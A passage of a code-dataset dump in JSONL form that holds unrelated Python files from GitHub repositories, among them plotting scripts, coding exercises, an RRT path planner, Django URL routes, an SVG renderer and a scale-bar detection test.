plot\r\nax.add_patch(table1)\r\nax.add_patch(table2)\r\n\r\n# Drawing lines between the tables and from table 2 to a point in the surrounding area\r\nplt.plot([0.3, 0.7], [0.3, 0.3], 'k-') # line between tables\r\nplt.plot([0.7, 0.7], [0.4, 0.8], 'k-') # line from table 2 to surrounding area\r\n\r\n# Labeling the tables\r\nplt.text(0.3, 0.15, '1', horizontalalignment='center')\r\nplt.text(0.7, 0.15, '2', horizontalalignment='center')\r\n\r\n# Adjusting the limits and aspect ratio of the plot to ensure that everything fits\r\nax.set_xlim(0, 1)\r\nax.set_ylim(0, 1)\r\nax.set_aspect('equal')\r\n\r\n# Displaying the plot\r\nplt.show()\r\n","repo_name":"roomaustin/Tables","sub_path":"tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"855429452","text":"from mlxtend.plotting import scatterplotmatrix\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n df = pd.read_csv(\"../../data/housing.data.txt\", header=None, sep=\"\\s+\")\n\n df.columns = [\n \"CRIM\",\n \"ZN\",\n \"INDUS\",\n \"CHAS\",\n \"NOX\",\n \"RM\",\n \"AGE\",\n \"DIS\",\n \"RAD\",\n \"TAX\",\n \"PTRATIO\",\n \"B\",\n \"LSTAT\",\n \"MEDV\",\n ]\n\n cols = [\"LSTAT\", \"INDUS\", \"NOX\", \"RM\", \"MEDV\"]\n\n scatterplotmatrix(df[cols].values, figsize=(10, 8), names=cols, alpha=0.5)\n plt.tight_layout()\n plt.savefig(\"../../figure/test_housing_eda.png\")\n","repo_name":"suzshiro1024/machine_learning_3rd","sub_path":"src/chapter10/test_housing_eda.py","file_name":"test_housing_eda.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35443559744","text":"def shopping_list(budget,**kwargs):\n budget_calc = budget\n finished_orders = []\n if budget > 99:\n\n for products in kwargs.items():\n name = products[0]\n price = products[1][0]\n qty = products[1][1]\n current_order_total = price * qty\n if current_order_total <= budget_calc:\n if len(finished_orders) < 5:\n budget_calc -= current_order_total\n shopping_line_to_add = f\"You bought {name} for {current_order_total:.2f} leva.\"\n finished_orders.append(shopping_line_to_add)\n else:\n break\n return \"\\n\".join(x for x in finished_orders)\n\n else:\n return \"You do not have enough budget.\"\n\n\n\n\n\n\n\n\n# print(shopping_list(100,\n# microwave=(70, 2),\n# skirts=(15, 4),\n# coffee=(1.50, 10),\n# ))\n\n# print(shopping_list(20,\n# jeans=(19.99, 1),\n# ))\n\nprint(shopping_list(104,\n cola=(1.20, 2),\n candies=(0.25, 15),\n bread=(1.80, 1),\n pie=(10.50, 5),\n tomatoes=(4.20, 1),\n milk=(2.50, 2),\n juice=(2, 3),\n eggs=(3, 1),\n ))\n","repo_name":"maon0002/Python-Advanced-January-2023","sub_path":"past_exams/03_shopping_list.py","file_name":"03_shopping_list.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75247207848","text":"from datasets import load_dataset\nimport os\nimport argparse\nfrom fastcoref import FCoref\nfrom data_utils import loadJsonl\nimport json\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--gpu\", \n type=int, \n default=0)\n # data path\n parser.add_argument(\"--data_dir\",\n type=str,\n default=\"../../data/cross_doc_role_extraction/\")\n \n parser.add_argument(\"--output_dir\",\n type=str,\n default=\"../../data/cross_doc_role_extraction/coref_clusters\")\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n os.makedirs(args.output_dir, exist_ok=True)\n coref_model = FCoref(device=f'cuda:{args.gpu}')\n # Load the data\n train_data = loadJsonl(os.path.join(args.data_dir, \"train.jsonl\"))\n dev_data = loadJsonl(os.path.join(args.data_dir, \"dev.jsonl\"))\n test_data = loadJsonl(os.path.join(args.data_dir, \"test.jsonl\"))\n # Get the unique contexts\n unique_context_tuples = []\n for instance in train_data + dev_data + test_data:\n unique_context_tuples.append((instance['instance_id'],\n {'report_doctext': instance['report_dict']['doctext'],\n 'source_doctext': instance['source_dict']['doctext']})),\n \n print(f\"Unique contexts for coref: {len(unique_context_tuples)}\")\n unique_id_to_source_coref_clusters = {}\n ########################################################\n ### Report Coref Clusters\n ########################################################\n # Get the coref chains for report\n coref_preds_report = coref_model.predict(\n texts=[doctext_dict['report_doctext'] for _, doctext_dict in \n unique_context_tuples]\n )\n # For report\n for unique_id, coref_pred_report in zip([instance_id for instance_id, _ in unique_context_tuples], \n coref_preds_report):\n unique_id_to_source_coref_clusters[unique_id] = {'report': coref_pred_report.get_clusters()}\n ########################################################\n ### Source Coref Clusters\n ########################################################\n # Get the coref chains for source\n coref_preds_source = coref_model.predict(\n texts=[doctext_dict['source_doctext'] for _, doctext_dict in\n unique_context_tuples]\n )\n for unique_id, coref_pred_source in zip([instance_id for instance_id, _ in unique_context_tuples],\n coref_preds_source):\n unique_id_to_source_coref_clusters[unique_id]['source'] = coref_pred_source.get_clusters()\n\n ########################################################\n ## Save the coref clusters\n ########################################################\n with open(os.path.join(args.output_dir, \"instance_id_to_coref_clusters.json\"), \"w\") as f:\n json.dump(unique_id_to_source_coref_clusters, f)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"FACTSlab/FAMuS","sub_path":"src/data_processing/create_coref_clusters_for_data.py","file_name":"create_coref_clusters_for_data.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72304642729","text":"#Different method types in python\n\n#In python there are three different method types. The static method, the class method and the instance method. Each one of them have different characteristics and should be used in different situations.\n\nclass Student:\n schoolname=\"kolkata\"\n def __init__(self,m1,m2,m3):\n self.m1=m1\n self.m2=m2\n self.m3=m3\n\n def avg(self): # this is instant Mehod\n return (self.m1+self.m2+self.m3)/3\n @classmethod #class Method\n def schoolinfo(cls):\n print(f\"my school name {cls.schoolname}\")\n @staticmethod\n def schooltest():\n print(\"testt\")\n\nmysccholobject=Student(30,40,50)\nmysccholobject2=Student(70,80,90)\nprint(mysccholobject.m1)\nprint(mysccholobject.m2)\nprint(mysccholobject.m1)\nprint(mysccholobject.avg())\nprint(mysccholobject2.avg())\nmysccholobject2.schoolinfo()\nmysccholobject2.schooltest()\n\n","repo_name":"avijitMajumder/python_learning","sub_path":"Types of Methods.py","file_name":"Types of Methods.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71344875687","text":"import Structure\nimport createDomain\nimport matplotlib.pyplot as plt\nimport copy\nimport random\nimport numpy as np\nimport matplotlib.collections as mc\nimport time\n\n\nclass solver:\n def __init__(self, problem, step=1, threshold=1):\n self.problem = problem\n self.root = Structure.Node(problem.getInitial())\n self.goal = Structure.Node(problem.getGoal())\n # a tree asscociated with the problem\n self.tree = Structure.Tree(self.root)\n self.threshold = threshold # this control the bias\n self.step = step # step size\n self.limit = 10000 # maximum nodes generated\n\n # draw the problem with a given path\n def visualize(self, path=None):\n self.problem.drawDomain(path)\n\n # this method solves the problem using rrt\n # if it can't solve within the limit then return NoNE\n # it will also plot the graph\n def solve(self):\n q_new = self.root\n q_goal = self.goal\n count = 0\n start_time = time.time()\n while count <= self.limit:\n q_target = self.randomNode(0.1)\n q_nearest = self.tree.findNearestNode(q_target)\n q_new = self.extend(q_nearest, q_target, self.step)\n if q_new is not None:\n print(q_new.getCoordinate())\n q_new.setParent(q_nearest)\n self.tree.addNode(q_new)\n if q_new.distance(q_goal) < self.threshold:\n q_goal.setParent(q_new)\n self.tree.addNode(self.root)\n break\n count += 1\n if count is self.limit:\n return None\n else:\n # self.drawTree()\n path = self.traceBack(q_new)\n path.append(self.goal)\n\n print('the runtime is: {} s'.format(time.time() - start_time))\n if path is not None:\n print('the solver solved the problem!')\n print('Number of nodes in the path:{}'.format(len(path)))\n print('Number of total nodes in the random tree:{}'.format(\n len(self.tree.nodes)))\n self.finalVisualize([obs.getCoordinate() for obs in path])\n return path\n\n # generate a random node that does not overlap with obstacles\n # with some bias choose the goal directly\n def randomNode(self, probability):\n if random.random() < probability:\n return self.goal\n found = False\n while found is False:\n coord = (100 * random.random(), 100 * random.random())\n node = Structure.Node(coord)\n if not self.problem.CheckOverlap(node):\n found = True\n return node\n return None\n\n # given a random node find the nearest node in the tree and try to extend it\n # if it can't do that, then return None\n def extend(self, nearest, target, step):\n if nearest.distance(target) > step:\n (x1, y1), (x2, y2) = nearest.getCoordinate(), target.getCoordinate()\n if x1 == x2:\n coord = (x1, y1 + step * (y2 - y1) / abs(y1 - y2))\n else:\n vec = np.asarray((x2 - x1, y2 - y1))\n normalized = vec / np.linalg.norm(vec)\n difference = normalized * step\n coord = tuple(np.asarray((x1, y1)) + difference)\n node = Structure.Node(coord)\n else:\n node = target\n if not self.problem.CheckOverlap(node):\n return node\n else:\n return None\n\n # given a node, this method will find all its ancestors\n def traceBack(self, kid):\n result = []\n temp = kid\n limit = 100000\n count = 0\n\n while temp is not None:\n # print('d3123123')\n result.insert(0, temp)\n if count > limit:\n break\n count += 1\n temp = temp.getParent()\n # print(result)\n return result\n\n # visualize the tree asscociated with the problem\n def drawTree(self):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1, aspect='equal')\n ax.set_xlim(0.0, self.problem.width)\n ax.set_ylim(0.0, self.problem.height)\n for o in self.problem.obstacles:\n ax.add_patch(copy.copy(o.patch))\n ip = plt.Rectangle(self.root.getCoordinate(), .81, .81,\n facecolor='#ff0000', label='initial')\n ax.add_patch(ip)\n g = plt.Rectangle(self.goal.getCoordinate(), .81, .81,\n facecolor='#00ff00', label='goal')\n ax.add_patch(g)\n collections = []\n for node in self.tree.nodes:\n if node.parent is not None:\n z = [node.getCoordinate(), node.parent.getCoordinate()]\n collections.append(z)\n lc = mc.LineCollection(collections, colors='b', linewidths=0.8)\n ax.add_collection(lc)\n ax.legend(bbox_to_anchor=(1.04, 1), loc=\"upper left\")\n plt.show()\n\n # this method will draw a path and a tree after solving the problem\n def finalVisualize(self, path):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1, aspect='equal')\n ax.set_xlim(0.0, self.problem.width)\n ax.set_ylim(0.0, self.problem.height)\n for o in self.problem.obstacles:\n ax.add_patch(copy.copy(o.patch))\n ip = plt.Rectangle(self.root.getCoordinate(), .81, .81,\n facecolor='#ff0000', label='initial')\n ax.add_patch(ip)\n g = plt.Rectangle(self.goal.getCoordinate(), .81, .81,\n facecolor='#00ff00', label='goal')\n ax.add_patch(g)\n collections = []\n for node in self.tree.nodes:\n if node.parent is not None:\n z = [node.getCoordinate(), node.parent.getCoordinate()]\n collections.append(z)\n lc = mc.LineCollection(collections, colors='b',\n linewidths=0.8, label='tree')\n ax.add_collection(lc)\n if path is not None:\n x = [x for (x, y) in path]\n y = [y for (x, y) in path]\n plt.plot(x, y, label='path', color='r')\n ax.legend(bbox_to_anchor=(1.04, 1), loc=\"upper left\")\n plt.show()\n\n\nif __name__ == '__main__':\n # you can change the number (i.e. 50) to control the number of obstacles\n domain = createDomain.Domain(30, 20)\n solver1 = solver(domain)\n path = solver1.solve()\n","repo_name":"JudahZammit/Comp4190A3","sub_path":"RRTsolver.py","file_name":"RRTsolver.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39233409177","text":"def digits(n):\n k=n\n m=int()\n s=[]\n while(k>0):\n m=k%10\n s.append(m)\n k=k//10\n s.sort()\n return s\n\ndef gen_lis(n): \n i=1\n s=[]\n while(i<=n):\n s.append(i)\n i+=1\n return s\n\ndef check_pan(n):\n s=gen_lis(len(digits(n)))\n p=digits(n)\n if(s==p):\n return True\n\ndef loop(n):\n x=1\n y=1\n m=''\n b=1\n q=[]\n while(x<=n):\n while(y<=n):\n m=str(y)+str(x)+str(x*y)\n b=int(m)\n if(check_pan(b)==True and len(digits(b))==9):\n q.append(x*y)\n y+=1\n x+=1\n y=0\n q = list(dict.fromkeys(q))\n return q\n\nloop(1000)\n\n\n\t\n\n","repo_name":"fermihacker/ProjectEuler100","sub_path":"Problem032.py","file_name":"Problem032.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"4518431942","text":"import numpy as np\nimport h5py\n\n# labels = ['econom', 'financ', 'movie', 'music', 'news', 'resume', 'scien',\n# 'sport', 'stop', 'world', 'us']\n\n\ndef find_start_end(line_temp, line):\n start_file = 0\n end_file = 0\n filename = []\n if len(line_temp) == 1 and line != \".\":\n filename_temp = line.split(\"/\")[-1]\n filename = filename_temp.split(\".\")[0]\n start_file = 1\n end_file = 0\n print(filename)\n elif len(line_temp) == 1 and line == \".\":\n end_file = 1\n start_file = 0\n\n return filename, start_file, end_file\n\n\ndef find_kw(line_temp):\n labels = ['econom', 'financ', 'movie', 'music', 'news', 'resume', 'scien',\n 'sport', 'stop', 'world', 'us']\n keyword = []\n kw_found = 0\n for label2 in labels:\n if label2 in line_temp[-1][0:len(label2)]:\n if label2 == \"us\":\n if line_temp[-1][:-1] == \"us\":\n keyword = \"us\"\n print(keyword)\n kw_found = 1\n break\n else:\n keyword = line_temp[-1][:-1]\n print(keyword)\n kw_found = 1\n break\n\n return keyword, kw_found\n\n\ndef generator_train():\n path_feature = \"./data/multi-feature/\"\n while 1:\n # following loads data from HDF5 file numbered with fileIndex\n x = h5py.File(path_feature + \"train/train.hdf5\", \"r\")\n keys = x.keys()\n for key in keys:\n print(x[key])\n\n\n\ndef generator_test():\n x = 1\n return x\n\n\n\n\n","repo_name":"abkoesdw/multi-keywords-spotting","sub_path":"multi_keywords_func.py","file_name":"multi_keywords_func.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"19126840133","text":"import numpy as np\nimport cv2\nimport openslide\nimport os\nfrom PIL import Image\nimport sys\n\nslide = sys.argv[1]\n#id = '17039791'\noutput = sys.argv[2]\n\nif not os.path.exists(output):\n os.mkdir(output);\n\noslide = openslide.OpenSlide(slide)\nwidth = oslide.dimensions[0]\nheight = oslide.dimensions[1]\n\nlevel = oslide.level_count - 1\n\nscale_down = oslide.level_downsamples[level]\nw, h = oslide.level_dimensions[level]\n\n#print('level: ', level)\n#print('size: {}, {}'.format(w, h))\n\npatch = oslide.read_region((0, 0), level, (w, h));\n\nslide_id = slide.split('/')[-1].split('.svs')[0]\nfname = '{}/{}_mask.png'.format(output, slide_id);\n#fname = '{}/{}_mask.png'.format(output, scale_down);\npatch.save('{}/{}_resized.png'.format(output, slide_id));\n\nimg = cv2.imread('{}/{}_resized.png'.format(output, slide_id), 0)\nimg = cv2.GaussianBlur(img, (61, 61), 0)\nret, imgf = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\ncv2.imwrite(fname, imgf)\n\noslide.close()\n\n#imgf = cv2.resize(imgf, (0, 0), fx = 0.3, fy = 0.3)\n#cv2.imshow('img', imgf)\n","repo_name":"SBU-BMI/quip_paad_cancer_detection","sub_path":"patch_extraction_tumor_40X/back_ground_filter.py","file_name":"back_ground_filter.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"37316055232","text":"\"\"\"\n剑指 Offer 11. 旋转数组的最小数字\n把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。\n输入一个递增排序的数组的一个旋转,输出旋转数组的最小元素。\n例如,数组 [3,4,5,1,2] 为 [1,2,3,4,5] 的一个旋转,该数组的最小值为1。\n\n示例 1:\n\n输入:[3,4,5,1,2]\n输出:1\n示例 2:\n\n输入:[2,2,2,0,1]\n输出:0\n\ndate : 9-27-2020\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n # Perfect code\n def minArray_(self, numbers: [int]) -> int:\n i, j = 0, len(numbers) - 1\n while i < j:\n m = (i + j) // 2\n if numbers[m] > numbers[j]:\n i = m + 1\n elif numbers[m] < numbers[j]:\n j = m\n else:\n j -= 1\n return numbers[i]\n\n def minArray(self, numbers: List[int]) -> int:\n if not numbers:\n return 0\n if len(numbers) == 1:\n return numbers[0]\n left, mid, right = 0, 0, len(numbers)-1\n\n while numbers[left] >= numbers[right]:\n if right - left == 1:\n mid = right\n break\n mid = (left + right) // 2\n if numbers[left] == numbers[mid] == numbers[right]:\n return self.minInOrder(numbers, left, right)\n\n if numbers[mid] >= numbers[left]:\n left = mid\n elif numbers[mid] <= numbers[right]:\n right = mid\n\n return numbers[mid]\n\n def minInOrder(self, numbers, left, right):\n res = numbers[left]\n for i in range(left, right):\n if res > numbers[i]:\n res = numbers[i]\n return res\n\n\nsol = Solution()\n# nums = [10, 1, 10, 10, 10]\n# nums = [1, 3, 5]\n# nums = [1, 0, 1, 1, 1]\nnums = [1, 1, 1, 0, 1]\n\n# print(sol.minArray(nums))\nprint(sol.minArray_(nums))\n\n","repo_name":"Aiooon/MyLeetcode","sub_path":"python/offer_11_minArray.py","file_name":"offer_11_minArray.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33339942083","text":"def levenshteinDistance(s1, s2):\n if len(s1) < len(s2):\n return levenshteinDistance(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n # print(\"S1\",i,c1)\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n # print(\"S2\",j,c2)\n # https://medium.com/@ethannam/understanding-the-levenshtein-distance-equation-for-beginners-c4285a5604f0\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2) # if c1 == c2 else 1\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\ndef main():\n print(levenshteinDistance(\"kitten\", \"sitting\"))\n\nif __name__ == \"__main__\":\n main()","repo_name":"ananthanandanan/academics","sub_path":"inform_ret/levenshteinDistance.py","file_name":"levenshteinDistance.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"15339080724","text":"caloriesByElf = [0]\nelfIndex = 0\n\ninputFile = open(\"input.txt\", \"r\")\n\nfor line in inputFile:\n number = line[:-1]\n if len(number) == 0:\n caloriesByElf.append(0)\n elfIndex += 1\n else:\n caloriesByElf[elfIndex] += int(line)\n\ninputFile.close()\n\ntotal = 0\nfor i in range(3):\n maxCalories = max(caloriesByElf)\n total += maxCalories\n caloriesByElf.remove(maxCalories)\n\nprint(total)\n","repo_name":"Vimor123/advent-of-code-2022","sub_path":"day01/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29972543487","text":"from django.urls import path, re_path\nfrom . import views\nfrom chat import views as viewss\n\nurlpatterns = [\n path('login/', views.login_page, name='login'),\n path('register/', views.register_user_preliminary, name='register'),\n # path(r'^ajax/validate_username/$', views.validate_username, name='validate_username'),\n path('logout/', views.logout_view, name='logout'),\n path('request-box/<str:pk>', views.request_box, name='request-box'),\n path('friends/<str:pkk>/e2AAS2accpt23487dhjbSS<str:pk>AD8U3Hisd3nO8',\n views.accept_friendship, name='accept'),\n path('friends/<str:pkk>/adsjnSI38DJjndas83DDNKjab<str:pk>dde3ubufeb',\n views.ignore_friendship, name='ignore'),\n path('7sn2njJHDAnd93983y4<str:pk>sabu62e3d9hidwdYWDG7G6t',\n views.retract_friendship, name='retract'),\n path('friends/<str:pkk>/adia7378VSJASjhsxdhD763Gjb<str:pk>dnsfi8GDg6sasvJHd2S5',\n views.delete_friendship, name='delete-fr'),\n path('d2983jfewubWEAJKE89<str:pk>LK8897hDSQ7Goiuad',\n views.send_friendship, name='bmf'),\n path('friends/<str:pk>/', views.friends_list, name='friends'),\n path('mfriends/<str:pk>/', views.friends_list_mobile, name='mfriends'),\n path('', views.home, name='home'),\n path('ajax/validate_username/',\n views.validate_username, name='validate-username'),\n path('room/<str:pk>/', views.room, name='room'),\n path('userprofile/<str:pk>/', views.user_profile, name='userprofile'),\n path('create-room/', views.create_room, name='create-room'),\n path('update-room/<str:pk>/', views.update_room, name='update-room'),\n path('update-user/', views.update_user, name='update-user'),\n path('activity-page/', views.activity_page, name='activity-page'),\n path('topics/', views.topics_page, name='topics'),\n path('delete-room/<str:pk>/', views.delete_room, name='delete-room'),\n path('delete-message/<str:pk>/', views.delete_message, name='delete-message'),\n path('delete-pm-message/<str:pk>',\n viewss.delete_pm_message, name='delete-pm-message'),\n path('loadmore/', views.load_more, name='loadmore'),\n re_path(\n r'\\w+(\\d|[a-z]|[A-Z]){6}(\\d|[a-z]|[A-Z]){9}(\\d){5}([A-Z]|[a-z]){5}[a-z]{3}(\\d|[A-Z]|[a-z]){4}',\n views.register_user),\n path('status-checker/', views.status_checker, name=\"status_checker\"),\n path('profile-status/<str:pk>', views.profile_status, name=\"profile_status\"),\n]\n","repo_name":"CarettaCaretta11/bhossc","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30978993643","text":"\"\"\"\nSimple utility to render an .svg to a .png\n\"\"\"\nimport os\nimport argparse\nimport pydiffvg\nimport torch as th\n\n\ndef render(canvas_width, canvas_height, shapes, shape_groups):\n _render = pydiffvg.RenderFunction.apply\n scene_args = pydiffvg.RenderFunction.serialize_scene(\n canvas_width, canvas_height, shapes, shape_groups)\n img = _render(canvas_width, # width\n canvas_height, # height\n 2, # num_samples_x\n 2, # num_samples_y\n 0, # seed\n None,\n *scene_args)\n # print(img.size())\n img = img[:, :, 3:4] * img[:, :, :3] + th.ones(img.shape[0], img.shape[1], 3, device=pydiffvg.get_device()) * (1 - img[:, :, 3:4])\n return img\n\n\ndef main(svg_dirs):\n pydiffvg.set_device(th.device('cuda:1'))\n\n assert os.path.exists(svg_dirs)\n svg_files = os.listdir(svg_dirs)\n for svg_file in svg_files:\n if '.svg' not in svg_file:\n continue\n svg_file_path = os.path.join(svg_dirs, svg_file)\n out_file_path = svg_file_path.replace('.svg', '.png')\n # Load SVG\n canvas_width, canvas_height, shapes, shape_groups = pydiffvg.svg_to_scene(svg_file_path)\n # Save initial state\n ref = render(canvas_width, canvas_height, shapes, shape_groups)\n pydiffvg.imwrite(ref.cpu(), out_file_path, gamma=2.2)\n\n\nif __name__ == \"__main__\":\n # parser = argparse.ArgumentParser()\n # parser.add_argument(\"svg_dirs\", help=\"source SVG path\")\n # args = parser.parse_args()\n styles = ['4', '9', '14', '30']\n # styles = ['30']\n for s in styles:\n svg_dirs = f'partial_svg_diffvg/style_{s}'\n main(svg_dirs)\n","repo_name":"hologerry/diffvg","sub_path":"apps/render_svg_dirs.py","file_name":"render_svg_dirs.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"34871012010","text":"import sys\nsys.path.append('/homes/ydwang/projects')\nfrom utils.Split_Dataset import split_dataset_folds\nimport csv\nimport os\nimport pandas as pd\nimport numpy as np\n\n\nclass make_index_csv:\n def __init__(self, case_list, save_csv_path, test_index_percent=0.2, nfold=4, is_upsample=False, up_label=1, up_times=0):\n self.case_list = case_list\n self.save_path = save_csv_path\n self.test_index_percent = test_index_percent\n self.nfold = nfold\n self.is_upsample = is_upsample\n self.up_times = up_times\n self.up_label = up_label\n self.csv_names = ['train_index.csv', 'val_index.csv', 'test_index.csv']\n\n def get_csv(self):\n for m in range(self.nfold):\n train_list, val_list, test_list = [], [], []\n train_label_list, val_label_list, test_label_list = [], [], []\n\n for label, case in enumerate(self.case_list):\n [train_nfold, val_nfold, test_index] = split_dataset_folds(case, self.test_index_percent, self.nfold)\n train_index = train_nfold[m]\n val_index = val_nfold[m]\n if self.is_upsample == True and label == self.up_label:\n for i in range(self.up_times):\n train_list += train_index\n train_label_list += len(train_index) *[label]\n val_list += val_index\n val_label_list += len(val_index) *[label]\n test_list += test_index\n test_label_list += len(test_index) *[label]\n else:\n train_list += train_index\n train_label_list += len(train_index) *[label]\n val_list += val_index\n val_label_list += len(val_index) *[label]\n test_list += test_index\n test_label_list += len(test_index) *[label]\n\n index_list = [train_list, val_list, test_list]\n label_list = [train_label_list, val_label_list, test_label_list]\n print(test_list)\n\n for i in range(len(self.csv_names)):\n row_list =[]\n save_folder = os.path.join(self.save_path, 'fold_' + str(m))\n os.makedirs(save_folder, exist_ok=True)\n with open(os.path.join(save_folder, self.csv_names[i]), 'w') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(['ID', 'label'])\n for j in range(len(index_list[i])):\n row_list.append([index_list[i][j], label_list[i][j]])\n writer.writerows(row_list)\n\n\ndef get_case_list(folder, csv_path):\n PD_list, NC_list = [], []\n df = pd.read_excel(csv_path)\n data = np.asarray(df.values)[:, 0:2]\n files = os.listdir(folder)\n other_list = []\n print(len(files))\n for file in files:\n for i in range(data.shape[0]):\n id = data[i][1]\n if str(id) == str(file[0:10]):\n label = data[i][0]\n if label == 'PD':\n PD_list.append(file)\n elif label == 'NC':\n NC_list.append(file)\n elif label == 'NC ':\n NC_list.append(file)\n else:\n other_list.append(file)\n print(len(NC_list), len(PD_list))\n return PD_list, NC_list\n\n\nif __name__ == '__main__':\n csv_file = r'/homes/ydwang/Data/rujin_case_list_key-20200530-toECNU.xlsx'\n folder = r'/homes/ydwang/Data/stage_data_0616'\n [PD_list, NC_list] = get_case_list(folder, csv_file)\n\n save_path = r'/homes/ydwang/projects/RJ_PD_dignosis/index/5_fold_up'\n make_index_csv(case_list=[NC_list, PD_list], save_csv_path=save_path,nfold=5,\n is_upsample=True, up_label=1, up_times=3).get_csv()\n","repo_name":"wangyidada/PD_diagnosis","sub_path":"PD_Diagnosis_code/utils/make_csv_index.py","file_name":"make_csv_index.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42984347867","text":"import unittest\nimport json\nimport pathlib\nimport os\nfrom PIL import Image\nimport random\nimport torchvision.transforms as T\nimport torch\nimport numpy as np\n\nfrom .. import figure\nfrom ..figures.scale.dataset import ScaleBarDataset\nfrom ..figures.scale.engine import evaluate\nfrom ..figures.scale.utils import collate_fn\n\nclass TestScaleDetection(unittest.TestCase):\n\n def setUp(self):\n \"\"\" Instantiates a test search query and FigureSeparator to test \"\"\"\n nature_json = pathlib.Path(__file__).parent / 'data' / 'nature_test.json'\n with open(nature_json, \"r\") as f:\n query = json.load(f)\n\n self.query = query\n self.figure_separator = figure.FigureSeparator(query)\n self.current_directory = pathlib.Path(__file__).resolve(strict=True).parent\n \n def test_scale_object_detection_accuracy(self):\n \"\"\" Tests the accuracy and validity of scale bar object detection \"\"\"\n test_image_directory = self.current_directory / 'data'\n dataset = ScaleBarDataset(test_image_directory, T.ToTensor(), True, 5)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=32,\n collate_fn=collate_fn, num_workers=0,\n shuffle=False)\n coco_eval = evaluate(self.figure_separator.scale_bar_detection_model,\n dataloader, self.figure_separator.device)\n\n def test_scale_label_reading_accuracy(self):\n \"\"\" Tests the accuracy of reading scale bar labels \"\"\"\n # set constants\n scale_label_data = pathlib.Path(__file__).parent / 'data' / 'scale_label_dataset'\n min_low_test_images = 100\n min_high_test_images = 50\n max_test_images = 250\n high_confidence_threshold = 0.9\n expected_high_confidence_correct = 0.8\n low_confidence_threshold = 0.6\n expected_low_confidence_correct = 0.5\n \n # keep track of accuracy\n high_correct = 0\n high_total = 0\n low_correct = 0\n low_total = 0\n total = 0\n\n # test on random images\n while ((high_total < min_high_test_images or \n low_total < min_low_test_images) and \n total < max_test_images):\n total += 1\n # randomly pick label\n label_dir = random.choice(os.listdir(scale_label_data))\n label = str(label_dir)\n # randomly pick image with selected label\n image_file = random.choice(os.listdir(scale_label_data / label))\n scale_label_image = Image.open(scale_label_data / label / image_file).convert(\"RGB\")\n result, confidence = self.figure_separator.read_scale_bar(scale_label_image)\n \n if confidence < low_confidence_threshold:\n continue\n # if confidence above lower threshold\n low_total += 1\n if result == label:\n low_correct += 1\n # if confidence above higher threshold\n if confidence >= high_confidence_threshold:\n high_total += 1\n if result == label:\n high_correct += 1\n # accuracy tests\n self.assertGreaterEqual(low_total, min_low_test_images, \n (\"Only {} images had a confidence of greater than {}\".format(\n low_total, low_confidence_threshold)))\n self.assertGreaterEqual(high_total, min_high_test_images, \n (\"Only {} images had a confidence of greater than {}\".format(\n high_total, high_confidence_threshold)))\n high_accuracy = high_correct / float(high_total)\n low_accuracy = low_correct / float(low_total)\n self.assertGreater(low_accuracy, expected_low_confidence_correct,\n (\"Scale label reading had poor accuracy with {} % correct, \"\n \"less than desired {}% for predictions with confidence score \"\n \"of {}\".format(low_accuracy, expected_low_confidence_correct,\n low_confidence_threshold)))\n self.assertGreater(high_accuracy, expected_high_confidence_correct,\n (\"Scale label reading had poor accuracy with {} % correct, \"\n \"less than desired {}% for predictions with confidence score \"\n \"of 